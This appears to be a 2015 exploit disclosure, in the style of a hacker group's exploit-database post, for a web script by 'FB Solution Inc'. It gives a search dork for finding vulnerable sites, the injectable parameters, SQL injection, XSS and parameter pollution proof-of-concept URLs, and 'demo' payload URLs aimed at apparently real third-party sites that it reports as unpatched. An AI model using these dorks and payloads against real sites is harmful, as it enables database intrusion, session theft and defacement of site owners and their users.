# FB Solution Inc Multiple Exploit
# Sql Injection
# XsS ( Cross Site Scripting )
# HTTP Parameter Pollution
## Full Disclosure
#Exploit Title : FB Solution Multiple Exploit
#Exploit Author : Dz MinD injector
#Date : 03/12/2015
#Home : Algeria
#Home Fb : http://www.facebook.com/pokeme23
#Dork : "Designed and Developed By FB Solution Inc"
#Status : Not Patched
1. Description
[+]we have Many Way To inject sql in : gamepreview.php?id= & games.php?cat= & music.php?cat=
[+] This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code
(usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted
or not, it will execute the script in the user context allowing the attacker to access any cookies or session
tokens retained by the browser.
Affected items in this script :
/gamepreview.php
/games.php
/movies
/music.php
/search.php
/videos.php
[+] You Can use HTTP Parameter Pollution :
HPP attacks consist of injecting encoded query string delimiters
into other existing parameters. If the web application does not
properly sanitize the user input, a malicious user can compromise the logic of
the application to perform either clientside or server-side attacks
2. POC ( ProOf Of Concept ) =>
Sql Injection :
http://localhost/gamepreview.php?id=[Inject Here]
HTTP/1.1 200 OK
Date: Thu, 03 Dec 2015 17:19:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Server: cloudflare-nginx
CF-RAY: 24f0ef360a0425f2-MRS
Content-Length: 61
Cross Site Scripting ( XsS ) :
http://localhost/games.php?cat=><h1> XsseD </h1>
or
http://localhost//music.php?cat=><h1> XsseD </h1>
Follow other itmems...
HTTP Parameter Pollution :
http://localhost//movies?cat=[Affected parameter]
3.Demo:
Sql Injection :
http://www.funXdady.com/gamepreview.php?id=1%27
Xss :
http://sirXfleo.com/moviepreview.php?id=%3E%3Cmarquee%3E%3Ch1%3E%20XsseD%20By%20Dz%20MinD%20Injector%3C/marquee%3E%3C/h1%3E
HTTP Parameter Pollution :
http://www.osnfun.com//movies?cat=All%26n958846%
# Enjoy
# GreetZ ToO : Sige Dz - Dz Vatou - Kilwaa Dz & All Algeria HackerZ
#End
# Free Palastine